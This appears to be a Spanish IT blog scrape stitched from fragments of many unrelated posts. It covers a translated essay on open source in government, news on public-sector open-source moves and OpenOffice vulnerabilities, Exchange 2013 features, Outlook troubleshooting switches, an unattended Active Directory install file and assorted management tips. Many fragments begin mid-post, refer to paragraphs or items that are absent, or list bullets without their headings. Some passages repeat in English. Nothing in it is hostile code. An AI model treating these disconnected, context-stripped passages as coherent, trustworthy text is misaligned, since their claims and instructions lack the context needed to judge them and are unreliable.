• En primer lugar, los empleados públicos tienen que estar capacitados con una mejor comprensión y apreciación de las virtudes del código abierto. Aquellos organismos que tienen código abierto, lo hacen porque disponen de individuos entusiastas que encabezan la propuesta. Los proyectos exitosos están en el ámbito desde el primer día con la intención de ser de código abierto, y sirven para formar de nuevo la demanda del mercado. Iniciativas como 18F y el programa PIF pueden tratar de inspirar y educar a la próxima generación de defensores del código abierto dentro del Gobierno.
• En segundo lugar, aun cuando el organismo no llama explícitamente para ello, como expertos en la materia, los contratistas del Gobierno tienen el deber de explorar alternativas de código abierto y de educar al mercado como a prácticas de desarrollo estándar de la industria moderna. Cualquier observador casual puede ver la dirección de la marcha del mercado, y las empresas inteligentes tienen la oportunidad de ponerse en frente de ella. Crear competencias internas en torno a tecnologías más populares del momento y hacer crecer la demanda del Gobierno. Que sea más práctico para que el Gobierno haga lo correcto, en lugar de lo que siempre ha hecho.
• Por último, la comunidad de código abierto tiene que intensificar su juego, tanto en términos de lo que ofrece – cambiando la percepción de que el código abierto está escrito por aficionados – y el Gobierno de la recepción del código que recibe. Por el lado de la oferta, hay un modelo de negocio tremendo en ser los trajes detrás de cualquiera de los proyectos de código abierto más populares de Internet* – Automattic, GitHub, y Red Hat siendo algunos ejemplos – en la lucha contra el FUD y la prestación de soporte empresa“. Por el lado de la demanda, la comunidad necesita que sea un lastre no liberar el código ¿qué escondes?“), y hacer que el regreso de la inversión del organismo sea claro rompiendo la mentalidad del “nosotros contra ellos“, y apoyando, no criticando, los esfuerzos del Gobierno por aprender de código abierto.

¿Por qué no todo el software del Gobierno es de código abierto? Porque tienes una cadena de valor diseñada para producir software de código cerrado, un sistema en equilibrio, con pocos incentivos para reinventarse a si mismo. La tecnología ha hecho que colaborar en abierto sea más fácil en los últimos años, y como resultado, el ecosistema de código abierto se ha disparado. Sin embargo, como toda tecnología, el Gobierno tiene todavía un par de años de retraso en la adopción de la corriente principal.Esperemos que, con su ayuda, esto puede cambiar.

Notas al pie del traductor

• del inglés Fear, Uncertainty and Doubt, en español miedo, incertidumbre y duda.
• En el texto original utiliza la palabra agencia, pero la he traducido como organismo dado que es algo más cercano a nuestra cultura sobre las AA.PP.
• Se refiere al equivalente en EE.UU. de la carrera española de Grado de Ingeniería en Informática.
• del inglés Request For Proposal, traducido como Solicitud de Propuesta. Es un tipo de documento de adquisición que se utiliza para solicitar propuestas de posibles vendedores de productos o servicios para un proyecto.
• 18F es una agencia de servicio digitales perteneciente a la Administración General de los EE.UU. Este grupo produce productor digitales para las organizaciones gubernamentales mediante el uso de metodologías LEAN, código libre y lenguajes de programación actuales. Su nombre proviene de su localización en Washintong DC entre las calles 18 y F.
• Consumer Financial Protection Bureau, traducido como Oficina de Protección Financiera del Consumidor de los Estados Unidos. Es una agencia federal gubernamental responsable de la regulación de protección al consumidor en los EE.UU.
• del ingles Freedom of Information Act, traducido como Ley por la Libertad de la Información. Es una ley que otorga a todos los ciudadanos de los EE.UU. el derecho de acceso a la información federal del Gobierno.
• Federal Aviation Administration* traducido como Administración Federal de Aviación. Es la entidad gubernamental responsable de la regulación de todos los aspectos de la aviación civil en los EE.UU.
• Food and Drug Administration*, traducido como Agencia de Alimentos y Medicamentos. Es la agencia del Gobierno de los EE.UU. responsable de la regulación de alimentos (tanto para personas como para animales), medicamentos (humanos y veterinarios), cosméticos, aparatos médicos (humanos y animales), productos biológicos y derivados sanguíneos.
• Negativistas del código abierto. Personas que se encuentran en contra del uso de soluciones de código abierto.
• Presidential Innovation Fellows. Se trata de un programa de becas competitivas en la que se que los une a los principales innovadores del sector privado, organizaciones sin animo de lucro y gente del mundo académico con los principales innovadores en el Gobierno de EE.UU. para colaborar en soluciones que tienen como objetivo ofrecer resultados significativos en seis meses.

Traducido de la fuente original: http://ben.balter.com/2014/08/03/why-isnt-all-government-software-open-source/

No explican qué solución están utilizando, pero según las palabras de Klaus Felsche, Director de Valoración del Riesgo y Analíticas de esta agencia se usa “la mayoría de los análisis de alto nivel”.

Entre las razones realmente interesantes que ha dado destacan las siguientes:

• “De alguna manera, es efectivamente más capaz que los productos comerciales…”
• “En términos de costo-efectividad, gana sin despeinarse:. Ninguna licencia / cuotas de mantenimiento, la arquitectura extensible fuente abierto global de investigación y desarrollo(R&D)…”
• “Existen costes reales: Tenemos que mantener un equipo de especialistas en el personal para construir, mantener, pero en el gran esquema de las cosas, otro software requerirían un apoyo similar en la casa…”
• “Está demostrando ser robusto, rápido y preciso, y en las manos de un experto, produce resultados que son aptos para el uso previsto. Y no se puede superar ese precio…”
• “Proveedores de software comerciales también están reconociendo las capacidades y costo-efectividad de R, y han trabajado muy duro para traer R en su suite de soluciones…”

Fuente: http://www.futuregov.asia/articles/2014/aug/29/why-we-use-open-source-australias-immigration-agen/

Este cambio viene auspiciado por la crisis que sufrió el país en el año 2008, y aunque el coste es un factor importante, destaca que la principal motivación sea el romper las ataduras con proveedores mejorando sus posibilidades de elección en el futuro.

Tryggvi Bjorgvinsson, el líder de este proyecto gubernamental, ha hecho algunas declaraciones jugosas al respecto que resumimos a continuación.

De momento dentro de este plan ya se han alcanzado algunos hitos como migrar cinco de sus treinta y dos escuelas secundarias de Windows a Ubuntu e incluso están usando paquetes ofimáticos libres y/o Moodle. Otro hito importante es la migración de la PBX del Servicio de Conservación del Suelo a Asterisk.

De los comentarios que hace Bjorgvinsson me parece curioso que diga que el mayor problema que se han encontrado es el propio uso de los estándares abiertos que no son capaces de manipular las instituciones que usan software propietario.

Lo que ya no me hizo tanta gracia, porque es algo que he vivido de cerca, es el “amable secuestro” (ironía) al que tienen sometidas las empresas de software privativo con sus soluciones integrales, que te obligan a realizar un cambio radical de toda la infraestructura TI cuando quieres abandonarlos.

Por suerte en Islandia no tienen prisa y sí la convicción de hacer un trabajo solido y van avanzando despacito pero con cabeza, y ya tienen claro que el proceso se demorará durante años.

Fuente: http://www.wired.co.uk/news/archive/2012-03/23/iceland-open-source-software

Fruto de estas preocupaciones se estableció en marzo de este año un grupo de trabajo en la Academia de Ingeniería de China encabezado por Ni Guangnan para crear un sistema operativo de cosecha propia basado en Linux.

Según esta misma fuente, probablemente durante el próximo mes de octubre estará disponible una versión de escritorio que posteriormente, aunque sin fecha definida, se expandirá a los teléfonos inteligentes y otros dispositivos móviles.

Entre las declaraciones que hizo Ni destacan las siguientes:

[…]”Existen algunos problemas no relacionados con cuestiones técnicas que pueden complicar el desarrollo de este proyecto, entre ellos la falta de fondos para la investigación y que muchos desarrolladores trabajan en diferentes direcciones.”[…]

[…]”China cuenta con más de una docena de desarrolladores de sistemas operativos móviles que no tienen derechos de propiedad intelectual independientes debido a que su investigación se basa en Android“, dijo Ni, añadiendo el desarrollo futuro debe ser dirigido por el propio Gobierno Chino.[…]

[…]”El fin de Windows XP y la prohibición gubernamental sobre la adquisición de Windows 8 han abierto la puerta a los desarrolladores de sistemas operativos domésticos.[…]

[…]”Nuestra clave del éxito está en un entorno que puede ayudarnos a competir con Google, Apple y Microsoft“.[…]

Siempre es bienvenida la iniciativa por parte de un gobierno o institución pública para desarrollar alternativas libres, pero teniendo en cuenta los antecedentes del Gobierno Chino a este respecto, ¿será realmente software libre? ¿Será un caballo de Troya para que el propio Gobierno de China haga lo mismo de lo que se queja? Lo veremos en un futuro próximo.

Fuente: http://www.bbc.com/news/technology-28928369

La primera permite la inyección de código en la memoria al ejecutar hojas de cálculo especialmente diseñadas para explotar esta vulnerabilidad y la segunda genera una vista previa de los documentos que, de enviarse a terceros usuarios, podrían llegar a conseguir el acceso completo a los datos.

Fuentes: http://www.openoffice.org/security/cves/CVE-2014-3524.html y http://www.openoffice.org/security/cves/CVE-2014-3575.html

Tras realizar un estudio estimaron que el coste total de propiedad de las licencias que hubieran sido necesarias se estimaba en veintidós millones de euros y con este cambio estiman que se van a ahorrar seis millones de euros. Así que todos estos equipos migrarán a GNU/Linux,Open Office, Thundebird y Firefox.

Este cambio es importante no solo porque supone que otra administración abandone el software propietario, sino porque Turín es uno de los centros económicos, políticos y administrativos de Italia, lo que da a este cambio todavía mayor importancia dada la relevancia de la ciudad.

Fuente:http://torino.repubblica.it/cronaca/2014/08/03/news/il_comune_rinnova_i_pc_e_d_laddio_a_microsoft_risparmiamo_6_milioni-93067980/

¿A qué viene el párrafo anterior, pues es sencillo de explicar. Me acaba de llegar a mi cuenta un correo publicitario de esta compañía invitándome a probar su nueva suite Cloud Site para Google Drive que está compuesta por cuatro aplicaciones:

• Drive Box. El cliente de sincronización con Google Drive.
• PrtSc. Capturas de pantalla compartidas a través de un enlace de Google Drive.
• Rolls. Permite compartir una colección de fotos o el escritorio mediante un enlace.
• Warehouse. Permite realizar copias de seguridad directamente a Google Drive.

Curiosamente de las cuatro que lo componen tan solo se puede probar PrtSc y aún sigue en modo beta, lo cual no deja de ser paradójico, ¿invitas a probar un software que todavía no está disponible ni para probarlo? Yo no lo he entendido.

¿Vale la pena pagar por estos servicios? Pues depende, si usas mucho Google Drive como yo, puede que sí, pero sería un detalle poder probarlas antes.

Fuente: https://insync.io/

Laverna se anuncia como una alternativa de código abierto a Evernote, pero tengo que reconocer no es tan complejo como este. En cambio, es una aplicación web para notas muy simple que soporta Markdown, creación de tareas y cifrado (si has leído bien, cifrado).

Su mayor baza es que puedes instalar Laverna en tu propio servidor o usarlo como SaaS directamente desde Internet en el enlace que te proporcionamos al final de este artículo.

La idea básica es que Laverna guarda todas las notas dentro de tu navegador o si quieres sincronizarlas en la nube para acceder desde diferentesdispositivos, puedes elegir entre Dropbox o remoteStorage.

La aplicación tiene pocas opciones y son muy fáciles de configurar, pero a cambio el funcionamiento es bastante bueno.

Si te preguntas por qué deberías usar Laverna frente a Evernote, la respuesta es sencilla y doble. Laverna* se puede instalar en tu propia infraestructura, por lo que no tienes que preocuparte por perder tus datos en cualquier momento si tu proveedor se va a la quiebra y deberías preguntarte por qué vas a dejar en manos de otros tus datos, y que conste que no es paranoia.

Fuente: https://laverna.cc/{:target="_blank"}

Aprovecho la efeméride para dejaros el enlace a un vídeo deYouTubepublicado en el canal de Scout by TeleNav donde se muestra la evolución de este proyecto durante este tiempo.

Por último otro enlace a una interesante entrevista que le han realizado a Steve Coast, fundador de OpenStreetMap, explicando su proyecto.

Enlace vídeo: http://youtu.be/7sC83j6vzjo

Fuente entrevista: http://techcrunch.com/2014/08/09/for-the-love-of-open-mapping-data/

El terminal cuenta con las siguientes características:

• Un procesador de un núcleo a 1 GHz.
• 256 MB de RAM
• Conectividad solo GSM.
• Dual SIM.
• Pantalla capacitativa de 3,5 pulgadas con una resolución HVGA
• Cámara trasera de 2 MP y delantera de 0,3 MP.
• Bluetooth, Wi-Fi y GPS.

Fuente: http://tech.firstpost.com/news-analysis/spice-fire-one-running-firefox-os-to-launch-on-29-august-for-rs-2299-230409.html

Fuente de la imagen: http://www.snapdeal.com

La era moderna de la Gestión de Proyectos

1917 - El diagrama de Gantt

1956 - Fundación de la Asociación Americana de Ingenieros de Costes (AACE)

1957 - El Método del Camino Crítico (CPM)

1958 - La Técnica de Revisión y Evaluación de Programas (PERT)

1962 - Creación de la Estructura de Desglose del Trabajo (WBS)

1965 - Se funda la Asociación Internacional de Gestión de Proyectos (IPMA)

1969 - Se crea el Instituto de Gestión de Proyectos (PMI)

1970 - Se crea el método en cascada

1975 - Se publica el El Mítico Hombre-Mes

1986 - Nacimiento de Scrum

1987 - Se publica la primera versión de la Guía PMBOK

1989 - La Gestión del Valor Ganado (EVM) gana protagonismo

1989 - Se publica PRINCE

1994 - Primera publicación del informe CHAOS

1996 - Se publica PRINCE2

1997 - Gestión de Proyectos por Cadena Crítica (CCPM)

1998 - PMBOK se convierte en un estándar

2001 - El Manifiesto Ágil

2006 - Marco de Gestión de Costo Total (TCM)

2008 - Cuarta edición de la Guía PMBOK

2009 - Revisión completa de PRINCE2

2012 - Quinta edición de la Guía PMBOK

• TechNet Evaluation Center: Software de evaluación gratuita sin límites de características, disponible durante 30 a 180 días. Incluye recursos enriquecidos de evaluación y http://technet.microsoft.com/es-es/virtuallabs/, que le permiten evaluar software sin tener que instalar bits de manera local.
• Microsoft Virtual Academy: sitio de aprendizaje en línea gratuito que incluye más de 200 cursos técnicos de aprendizaje técnico dirigidos por expertos en más de 15 tecnologías de Microsoft, con más que se agregan cada semana.
• Foros de TechNet: Foros en línea gratuitos en los que los profesionales de TI pueden hacer preguntas técnicas y recibir respuestas rápidas de los miembros de la comunidad.

1. Ponerse en la piel del otro e intentar comprender la posición de la otra persona. Es necesario explicarle a la otra persona cómo hemos interpretado sus argumentos para dejarle claro que hemos entendido correctamente su posición.
2. Revisar los puntos en los que se coincide y comentarlos. Primero debemos tender lazos de conexión y demostrarle a la otra parte que hemos analizado y que sabemos de qué estamos hablando, es decir, que no nos mueven intereses particulares como la envidia o la soberbia.
3. Analizar las lecciones aprendidas de los comentarios de la otra persona. Todos los días aprendo algo nuevo o mejoro mi comprensión un tema compartiendo información, ¿vosotros no?
4. Expresar nuestra critica o refutación a sus ideas de forma ordenada, clara y positiva. La grandilocuencia y los discursos vehementes están bien para los políticos cuando salen en televisión. La persona que tienes enfrente espera lo mismo que tú, aprender y mejorar, pero también tiene sentimientos y las personas no solemos aceptar muy bien que alguien intente cambiar nuestras ideas, esto requiere de mucha voluntad y paciencia por ambas partes.

¿No te lo crees? Pregúntaselo a los directivos de Hershey’s.

La nueva versión trae muchas mejoras, como es evidente, pero las principales serían el soporte UEFI y el nuevo instalador que permite agilizar y simplificar la instalación.

Para obtener más detalles sigue este enlace.

—

Good news for Debian’s users. Neil McGovern has confirmed by a statement that Debian 7 “Wheezy” will be published between 4th and 5th of May. It may seem an irrelevant fact but considering that version 6 was released in February of 2011 I think it deserves at least a review.

The new version brings many improvements, as is evident, but principals would support be UEFI and the new installer that allows to speed up and simplify installation.

For more details follow this link.

Este video tutorial será útil para todos aquellos que tengáis hijos y les permutáis usar un ordenador con Windows 8 instalado.

—

Jetstress is used to verify the performance and stability of a disk subsystem prior to putting an Exchange server into production. The tool helps to verify disk performance by simulating Exchange disk Input/Output (I/O) load, specifically simulating the database and log file loads produced by a specific number of users.

No entiendo porque tengo que hacer dos clic para cerrar una ventana. Tampoco entiendo porque no puedo personalizar mi escritorio desde un simple clic en vez de una aplicación como Gnome Tweak Tool que no es precisamente muy usable, no entiendo porque necesito un mapa para encontrar las aplicaciones en vez de tener un menú único,…

En resumen, demasiados cambios incomprensibles para algo que debería ser una herramienta de trabajo.

Será que me estoy volviendo viejo, pero todas las ventajas a las que tanto bombo y platillo se han dado a esta versión de Gnome, ¡estaban ya en la versión anterior! Así que me tome el trabajo de instalar MATE para volver a lo que sé que funciona, a lo que siempre me ha parecido perfecto desde el ¡2002!, el vetusto Gnome 2.

Por cierto, el comando para hacerlo es

$ su -c ‘yum groupinstall “MATE Desktop”

Ridley Scott realizó la considerada una de las mejores películas de la historia y desde luego la mejor (para muchas personas) película de ciencia ficción. El film está basado en la historia narrada en el libro de Philip K Dick: “¿Sueñan los androides con ovejas eléctricas?”, uno…

—-

While I pay top dollar for the iPhone 5, they treat people makes them the terminals like crap. Could not Apple spend 50 euros of what we paid in the West for each of these phones to provide a decent life to these people?

5 pasos antes de comenzar a desarrollar un Plan de trabajo que nunca deberíamos olvidar.

A la gente de la Fox tendría que caersele la cara de vergüenza después de verlo que un grupo de aficionados han hecho con la el poco dinero que han recaudado mediante crowfunding. Espero que puedan terminar haciendo la película que proyectan,  seguro que arrasaría en taquilla.

Nokia está empeñada en dar un buen puñetazo encima de la mesa,  bueno en realidad son tres,  con los Lumia con Windows 8. Estaba revisando las características del Lumia 620 y me he dado cuenta que los finlandeses van a poner un terminal de gama media-alta por un precio ridículo, tan solo 262 euros (al menos en España). Está claro que no no puede competir con un iPhone 5 o un Galaxy SIII,  pero tampoco es su mercado,  yo diría que está más en la línea del SIII mini o el iPhone 4S y ahí se defiende muy bien,  pero que muy bien,  y lo mejor es que cuesta mucho menos.

Lo que sí tengo claro es que este nuevo Lumia se ha puesto en mi radar y eso que yo estaba ya contando los euros para comprarme un Lumia 920, y es que ese precio tienta mucho.

Una buena noticia para un producto que no para de crecer. LINE permite realizar llamadas de voz desde el PC al móvil. Este puede ser un movimiento definitivo que permita a esta plataforma en convertirse en un rival de altura para WhatsApp.

• El objeto de CAS Array no realizar balanceo de carga del tráfico.
• El objeto de CAS Array no sirve OWA, ECP, EWS, Autodescubrimiento, IMAP, SMTP o POP.
• El objeto de CAS Array no necesita ser parte del certificado SSL.
• El objeto de CAS Array no debe ser resuelto vía DNS por clientes externos.
• El objeto de CAS Array no debe ser creado o cambiado después de crear las bases de datos de buzones y mover buzones a ellas.
• El objeto de CAS Array debe ser creado incluso si solo se tiene un CAS o un servidor con múltiples roles.

• Dos cabezas son mejores que una. Una vez trabajé con un tipo que siempre compartió sus ideas sobre planes de proyectos futuros o cambios que podían afectar al equipo. A pesar de que siempre tenía la autoridad de tomar la última decisión (y no trataba de traspasar esa autoridad al grupo), sentía como si siempre hubiera sido una buena idea obtener una segunda opinión. "Puedo tomar decisiones muy estúpidas si lo hago completamente por mi cuenta", decía, "pero tengo menos probabilidades de hacer algo realmente estúpido si discuto mis planes con los demás." Con los años, he llegado a darme cuenta de que tenía razón.
• Pare, mire y escuche. Una canción que aprendí cuando era niño comenzaba más o menos así: "Para, mira y escucha. Tus ojos le dirán a tus pies cuando puedes cruzar la calle. En primer lugar detente. Después mira. Después escucha atentamente. Puedes hacer casi cualquier calle tan segura como tu patio trasero ...". Probablemente han pasado 40 años desde la última vez que oí esa canción, pero es un buen consejo. Con demasiada frecuencia, actuamos sin pensar. Estoy seguro que al cigarrillo lanzado casualmente se hizo sin pensarlo dos veces. Si alguien hubiera pensado en ello, probablemente no habrían arrojado una colilla encendida en la hierba seca. Si la gente se tomara el tiempo para detenerse, mirar y escuchar, me pregunto cuántos millones de dólares gastados en la lucha contra los incendios y el pago por la pérdida de bienes se podría evitar. Creo que lo mismo es aplicable para los proyectos en los que trabajamos.
• No jugar a los dados con el dinero del alquiler. No voy a Las Vegas muy a menudo, pero suelo lanzar un poco los dados o jugar unas cuantas manos de blackjack. Me he dado cuenta de que hay básicamente dos tipos de jugadores: los que juegan con lo que no pueden darse el lujo de perder esperando el premio gordo al final de la partida, y los que van con un poco de dinero (este termino es relativo en función de lo que signifique la cantidad de un "pocos" dólares para ti) y esperan pasar entretenidos un par de horas en la mesa. Tiendo a ser de estos últimos. Si no tienes para gastarlo, no hay absolutamente nada divertido en el juego. Tampoco creo que sea una buena idea de jugar con el éxito del proyecto. Dicho esto, no me opongo a tomar un riesgo calculado que tiene el potencial de ofrecer una gran recompensa - Simplemente no apostaría la granja.

• Los problemas que el update rollup corrige.
• Cómo obtener el update rollup.
• Los prerequisitos para instalar el update rollup.

• Los problemas que el update rollup corrige.
• Cómo obtener el update rollup.
• Los prerequisitos para instalar el update rollup.

• Simplicidad de despliegue. Tan solo existen dos roles, servidor de buzones (Mailbox Server) y cliente de acceso (Client Access Server). El rol de servidor de buzones se encarga de realizar todo el procesamiento de las acciones sobre el buzón mientras que el cliente de acceso se encarga solamente de la autentificación, redirección y servicio de caché.


• Adios a RPC como protocolo de acceso. Toda la conectividad con Outlook se hace usando RPC sobre HTTPS, es decir, Outlook Anywhere. Esto hace que se rompan algunas de las restricciones propias de RPC y añade flexibilidad a la plataforma como por ejemplo tener un sitio central de servidores de acceso de cliente para toda la organización.


• Un proceso por base de datos. El proceso store.exe de cada base de datos se ejecuta como un proceso independiente, es decir, el fallo de uno de los procesos solo afecta a una base de datos.


• Data Loss Prevention. Se trata de una serie de reglas para la protección de la información de la organización mediante el uso de una serie de normas regulatorias estandar como PII o PCI, e incluso permite crear reglas propias personalizadas. Esta es una noticia muy buena para aquellos que necesitamos restringir el tipo de información que se mueve dentro del correo electrónico.


• Integración total con Lync y Sharepoint 2013. Prácticamente es uno con Lync, impresionante. Respecto a Sharepoint la creación de los site mailboxes es todo un acierto. Ahora puedes acceder a los correos y a  los documentos de la organización desde una misma interfaz. Cuidado, no lo confundas con los ficheros adjuntos en un correo, no son lo mismo.


• Outlook Web App. La interfaz Metro en todo su explendor. Mucho más rápido, tan completo que parece que han trasladado Outlook 2013 a la web. Y muy importante, por fin se pueden crear tareas desde OWA.

• Adios a EMC. Ahora solo hay EMS puro y duro, es decir, PowerShell y consola de texto para todos. Bueno, esto no es cierto del todo han creado una interfaz web llamada Exchange Administrator Center que sustituye al EMC y el ECP, pero después de probarla durante un rato, me quedo con EMS.

• Mejoras en todas las áreas. Sería muy largo contar todas las mejoras que incluye. Mejoras en la replicación, en el soporte ActiveSync, mensajería unificada, etc. Si tienes ganas de revisarlas todas, sigue este enlace.

• Carpetas públicas. Socorro, pensé que me iba a librar de ellas, pero Microsoft las vuelve a rescatar.


• Requisitos hardware. Exchange 2013 Preview es pesado, muy pesado. He tenido que generar una máquina virtual con 2 vCPU y 6 GB para que vaya ligero. Espero que esto mejore en la RTM.

• Influencia. Se trata de gente que disfruta siendo capaz de influir en otros, son buenos negociando y persuadiendo y les encanta disponer de ideas y conocimiento que compartir. Destacan por su habilidad para crear conexiones y relaciones estratégicas. A pesar de la creencia popular no siempre se trata de buenos comerciales, sino que muchas veces encajan más como los que levantan el estado de animo a sus compañeros o consiguiendo concesiones por parte del cliente como tiempo extra para completar una tarea.
• Facilitación interpersonal. Se trata de gente que está muy en sintonía con las experiencias de otras personas y suelen trabajar entre bambalinas haciendo que los demás se mantengan centrados en los proyectos para que se ejecuten de forma fluida. Son, además, capaces de ayudar a sus compañeros con los conflictos que puedan surgir dentro del grupo. Normalmente en esta dimensión encajan los gestores de Recursos Humanos.
• Creatividad relacional. Se trata de gente que puede generar conexiones con otras personas a través de imágenes visuales y verbales. Hay que tener en cuenta que estas conexiones se generan en la distancia y no en el cara a cara. En esta dimensión encajan personas que son capaces de motivar a través de un discurso escrito, un anuncio publicitario, etcétera.
• Liderazgo de equipo. Hay gente que ve a otra gente y quiere interactuar con ella. Mediante esta interacción, prosperan a través de estas otras personas para conseguir metas, pero hay que tener en cuenta que están más interesados en las personas y los procesos necesarios para alcanzar la meta que en la propia meta. Les gusta gestionar y trabajar en equipos energéticos en ambientes febriles de servicio. En esta dimensión es típico encajar a gestores de programa y gestores de unidades de entrega de servicios directos.

Pasos básicos de resolución de problemas de Outlook

• ¿El problema es global?¿Afecta a otros usuarios o a un único usuario?
• Utiliza los modificadores listado más abajo.
• ¿Puedes abrir los perfiles de Outlook de los usuarios con problemas desde otro equipo para eliminar problemas específicos de equipo?
• ¿Puedes reproducir los mismos problemas desde OWA en vez de desde Outlook?
• ¿Problemas de cortafuegos o software antivirus en el equipo local?
• ¿Añadidos de terceros en el equipo con problemas?
• ¿Create un perfil adicional en el equipo con problemas y verificaste si el problema persistía?

Los modificadores más comunes para Outlook

• Outlook /CleanFreeeBusy.
• Outlook /ResetFolders.
• Outlook /CleanViews.
• Outlook /CleanReminders.

Un buen recurso: Outlook Configurator Analyzer

Listado de modificadores útiles para solucionar problemas de Outlook

Entre las novedades que tiene la nueva interfaz me ha gustado mucho la disposición de las entradas de los usuarios y la facilidad para publicar imágenes y vídeos. Como no me gusta ser zalamero, os invito a que entréis en vuestro perfil y lo comprobéis por vosotros mismos, y de paso os dejo este vídeo promocional que ha hecho la propia gente de Google.

• Parte 1: Entendiendo Microsoft Private Cloud.


• Parte 2: Desplegando los componentes de infraestructura.


• Parte 3: Desplegando la infraestructura de nube privada.


• Parte 4: Desplegando la capa de servicios.


• Parte 5: Desplegando las aplicaciones y las máquinas virtuales.

• Parte 6: Administrando los componentes de infraestructura.


• Parte 7: Administrando la infraestructura de nube privada.


• Parte 8: Administrando la capa de servicios.


• Parte 9: Administrando las aplicaciones y las máquinas virtuales.

• Mantenimiento reducido. Un sistema operativo más pequeño y que tiene menos funciones necesita menos mantenimiento de parches y actualizaciones y sobre todo es más seguro porque reduce su superficie de ataque precisamente al tener menos funcionalidades.
• Sistema «anti-manazas». Es triste decir esto pero, sin animo de entrar en polemicas, en casi todas las organizaciones existen «especialistas» que por una razón u otra disponen de acceso privilegiado a la infraestructura sin tener claros los conceptos de administración y gestión de un Directorio Activo, lo que suele acabar en la ejecución de tareas de recuperación de desastres.

Ilustración 1. Esquema laboratorio bosque W2k8 R2 Core Antes de comenzar quisiera comentar que el «Asistente para la instalación de Servicios de Directorio Activo» (dcpromo.exe) no admite un entorno gráfico de trabajo en los sistemas Windows 2008 Server Core por lo que se es necesario completar su ejecución en modo desatendido o añadiendo todos los parámetros junto con el comando, lo que me parece un autentico suplicio por lo que en este laboratorio vamos a ver la opción de instalación desatendida. El primer paso es crear el fichero de instalación desatendida especifico, en este caso, para generar el nuevo bosque. En este tutorial el contenido del fichero es el siguiente: [DCInstall]  InstallDNS=yes NewDomain=forest NewDomainDNSName=olimpo.local DomainNetBiosName=olimpo SiteName=Sitio-Olimpo ReplicaOrNewDomain=domain ForestLevel=4 DomainLevel=4 DatabasePath="%systemroot%ntds" LogPath="%systemroot%ntds" RebootOnCompletion=yes SYSVOLPath="%systemroot%sysvol" SafeModeAdminPassword=* Este fichero debemos copiar en la maquina que va a ser el primer controlador de dominio del nuevo bosque de Directorio Activo. Mi opción personal es colocarlo siempre en la raíz de C: con el nombre de fichero "desatendido.txt". Ilustración 2. Fichero de instalación desatendida Posteriormente, una vez iniciada la sesión en la mencionada máquina, desde la consola de terminal que se abre se debe teclear el siguiente comando: dcpromo /unattend:desatendido.txt Ilustración 3. Comando para lanzar la instalación desatendida Ilustración 4. Proceso de instalación desatendida (I) Ilustración 5. Proceso de instalación desatendida (II)  Ilustración 6. Proceso de instalación desatendida (III) Ilustración 7. Proceso de instalación desatendida (IV) Ilustración 8. Proceso de instalación desatendida (V) Una vez completado el proceso, la máquina se reiniciará de forma automática y ya dispondremos del primer controlador de dominio de nuestro bosque. Y con esto termino esta primera parte del tutorial.

• Dominios
• Sitios
• Controladores de dominio
• Unidades organizativas
• Buzones de correo Exchange
• Contactos
• Listas de distribución
• Equipos
• Usuarios

1. Copiar todo el contenido del disco antiguo al nuevo mediante la herramienta Carbon Copy Cloner.


2. Sustituir un disco por el otro. 

Ejecución del comando desde Terminal

Reindexado de Spotlight en funcionamiento

Error al arrancar Reporting Services

Eventos de Aplicación 113, 140 y 0

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Web Service\Performance:Counter Names


• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Web Service\Performance:Counter Types


• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Windows Service\Performance:Counter Names


• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Windows Service\Performance:Counter Types

Claves de registro generadas

Inicio normal de Reporting Services

Notificación de intento de recuperación de mensaje

• El cliente de correo que usa el receptor, basicamente si usa Outlook.
• La configuración del cliente de correo del receptor, principalmente de la opción de «Procesar automáticamente convocatorias de reunión y respuestas a convocatorias de reunión y sondeos».
• La lectura del correo enviado por parte del receptor. Si lo ha leído, no se puede recuperar el mensaje de correo.
• La ubicación del receptor del correo, es decir, si pertenece a la organización de Exchange o es un usuario  externo.

1. Revisa las direcciones de correo en los campos «Para», «CC» y «CCO».
2. Revisa los ficheros adjuntos al correo electrónico.
3. Revisa el asunto y el cuerpo del correo y analiza su contenido.

• Busca el mensaje en su carpeta de «Mensajes Enviados».

Buscando el correo erroneo en Elementos enviados.

• Abre el mensaje y en la cinta selecciona la pestaña «Archivo» tal y como se muestra en la figura siguiente:

Pestaña «Archivo» dentro del mensaje enviado.

• En la categoría «Información» selecciona la opción «Recuperar este mensaje» dentro del botón «Volver a enviar o recuperar».

Localización de la opción «Recuperar este mensaje…».

• En la ventana de dialogo «Recuperar este mensaje» que se abre a continuación selecciona las opciones «Eliminar las copias no leídas de este mensaje» e «Informar del éxito de la recuperación para cada destinatario» y pulsa el botón de «Aceptar».

Opciones de recuperación del mensaje.

Notificación de recuperación realizada.

Notificación de recuperación no realizada.

Seguimiento del mensaje recuperado.

• Lo primero es instalar los repositorios necesarios, en este caso los de LIVNA:

• Y ahora instalamos los codecs multimedia:

• Debió existir en algún momento una instalación de Exchange 5.5,
• Se debió hacer uso de las carpetas públicas.
• Has desplegado Exchange 2010 RTM.

• Que se actualicen correctamente.
• Que desaparezcan una parte de las replicas.
• Que desaparezcan todas y tengas que recuperar la información de las mismas desde una copia de seguridad.

• Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006  SP1 (Introducción)
• Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006  SP1 (OWA)
• Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006 SP1 (Outlook Anywhere)
• Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006 SP1 (ActiveSync)
• Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006 SP1 (Pruebas con un cliente)

• Para simplificar el entorno, suponemos que la máquina del ISA Server se encuentra en el dominio olimpo.des.
• Necesitamos un certificado wildcard para el dominio olimpo.des, de esta forma nos ahorramos tener que estar creando uno por máquina. Si no sabéis como obtener este tipo de certificados desde una entidad certificadora de Windows Server, seguid este tutorial que os he preparado en este enlace.
• Todo el software usado son versiones del producto en español.
• El controlador del dominio principal y el servidor de Exchange 2007 se ha montado con Windows 2008 SP2 Standard Edition sin Hiper-V x64 y Exchange Server 2007 SP2 x64.
• Usaremos Windows 2003 R2 Enterprise Edition x32 e ISA Server 2006 SP1 en la máquina que contendrá el servidor ISA.
• Por último, el cliente de pruebas será también una máquina con Windows 2003 R2 Enterprise Edition x32 con Microsoft Outlook 2007 SP2.

• Tener una entidad certificadora Windows 2008 integrada en el dominio.
• Cinco  minutos de tiempo para crear el certificado.
